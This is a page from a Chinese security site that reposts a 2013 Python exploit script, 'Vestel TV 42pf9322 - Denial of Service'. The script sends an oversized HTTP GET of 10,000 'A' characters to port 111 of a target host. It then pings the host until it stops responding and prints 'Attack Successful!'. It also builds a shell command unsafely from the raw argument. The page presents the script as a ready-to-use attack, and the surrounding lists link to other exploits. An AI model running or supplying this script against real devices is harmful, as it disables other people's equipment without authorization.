首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Vestel TV 42pf9322 - Denial of Service
来源:hackersofi@gmail.com 作者:HackerSofi 发布时间:2013-09-16  
#!/usr/bin/python
  
# Exploit Title: Vestel TV Denial of Service (DoS) Attack
# Exploit Author: HackerSofi - hackersofi@gmail.com 
# Date: 12/09/2013
# CVE Number: 
# Vendor Homepage: http://www.vestel.com/
# Description: Some TV's Has Communication Port. Vestel 42pf9322 Models TV Using Port 0f 111 For Network Communications. 
#              If You Launch An Attack 0n The Communication Port, Tv System Will Be Crashes. 
# Special Thanks : DaTaMaN
  
   
import httplib
import sys
import os
  
print "  ***************************************************************************************"
print "   Author: HackerSofi - hackersofi@gmail.com \n"
print "   Exploit: Denial of Service (DoS) attack\n"
print "   Description:\n"
print "   Some TV's Has Communication Port. Vestel 42pf9322 Models TV Using Port 0f 111 For Network Communications. "
print "   If You Launch An Attack 0n The Communication Port, Tv System Will Be Crashes.\n "
print "   Special Thanks : DaTaMaN "
print "  ***************************************************************************************\n"
  
# Sends The Request
print "  Sending The Request...\n"
conn = httplib.HTTPConnection(sys.argv[1],111)
conn.request("GET", "A"*10000)
conn.close()
  
# Checks The Response
print "  Checking The Status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
  response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
  if response != 0:
    print "  Attack Successful!\n"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Target Longlife Media Player 2
·Mitsubishi MC-WorkX 8.02 Activ
·MS13-053 Win32k Memory Allocat
·Ofilter Player 1.2.0.1 Buffer
·eM Client e-mail client v5.0.1
·PCMAN FTP 2.07 STOR Command -
·Watchguard Server Center 11.7.
·D-Link Devices UPnP SOAP Telne
·MS13-055 Microsoft Internet Ex
·Sophos Web Protection Applianc
·HP SiteScope Remote Code Execu
·Sophos Web Protection Applianc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved